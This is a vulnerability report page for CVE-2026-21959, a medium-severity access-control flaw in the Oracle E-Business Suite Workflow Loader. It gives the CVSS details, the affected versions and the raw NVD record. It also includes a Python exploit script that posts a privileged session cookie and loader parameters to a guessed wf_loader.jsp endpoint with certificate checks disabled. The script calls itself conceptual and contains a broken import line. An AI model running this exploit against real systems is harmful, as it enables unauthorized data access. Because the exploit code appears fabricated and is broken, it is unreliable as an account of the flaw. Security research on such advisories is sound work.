Security Vulnerability Report
中文
CVE-2026-21959 CVSS 4.9 MEDIUM

CVE-2026-21959

Published: 2026-01-20 22:15:59
Last Modified: 2026-01-29 20:59:34
Source: [email protected]

Description

Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Workflow Loader). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Workflow. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Workflow accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:workflow:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite 12.2.3
Oracle E-Business Suite 12.2.4
Oracle E-Business Suite 12.2.5
Oracle E-Business Suite 12.2.6
Oracle E-Business Suite 12.2.7
Oracle E-Business Suite 12.2.8
Oracle E-Business Suite 12.2.9
Oracle E-Business Suite 12.2.10
Oracle E-Business Suite 12.2.11
Oracle E-Business Suite 12.2.12
Oracle E-Business Suite 12.2.13
Oracle E-Business Suite 12.2.14
Oracle E-Business Suite 12.2.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21959 PoC - Oracle Workflow Loader Unauthorized Access # Note: This is a conceptual PoC for authorized security testing only import requests import sys from urllib3.disable_warnings import urllib3 urllib3.disable_warnings() def exploit_cve_2026_21959(target_url, session_cookie): """ Oracle Workflow Loader component unauthorized access PoC Requirements: - Valid high-privilege Oracle E-Business Suite session cookie - Target URL for Oracle Workflow Loader endpoint """ headers = { 'Cookie': session_cookie, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } # Workflow Loader endpoint (specific path depends on EBS configuration) workflow_loader_url = f"{target_url}/OA_HTML/wf_loader.jsp" # Malicious request to trigger unauthorized data access payload = { 'WFTYPE': 'LOADER', 'ACTION': 'LOAD', 'ITEM_TYPE': 'WFSTD', 'LOAD_TYPE': 'ALL' } try: response = requests.post( workflow_loader_url, data=payload, headers=headers, verify=False, timeout=30 ) if response.status_code == 200: # Check for sensitive data in response if 'WF_ATTRIBUTES' in response.text or 'WORKFLOW' in response.text: print('[+] Potential unauthorized data access detected') return True else: print(f'[-] Request failed with status: {response.status_code}') return False except requests.exceptions.RequestException as e: print(f'[-] Connection error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python cve-2026-21959.py <target_url> <session_cookie>') print('Example: python cve-2026-21959.py https://ebs.example.com "JSESSIONID=xxx"') sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] exploit_cve_2026_21959(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21959", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:58.740", "lastModified": "2026-01-29T20:59:34.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Workflow Loader). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Workflow. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Workflow accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Workflow de Oracle E-Business Suite (componente: Workflow Loader). Las versiones compatibles que están afectadas son 12.2.3-12.2.15. Una vulnerabilidad fácilmente explotable permite a un atacante con altos privilegios con acceso a la red vía HTTP comprometer Oracle Workflow. Los ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado a datos críticos o acceso completo a todos los datos accesibles de Oracle Workflow. Puntuación Base CVSS 3.1 de 4.9 (Impactos en la confidencialidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:workflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.15", "matchCriteriaId": "6A7096C1-7479-4111-A29B-5FF3AA0ECCD2"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.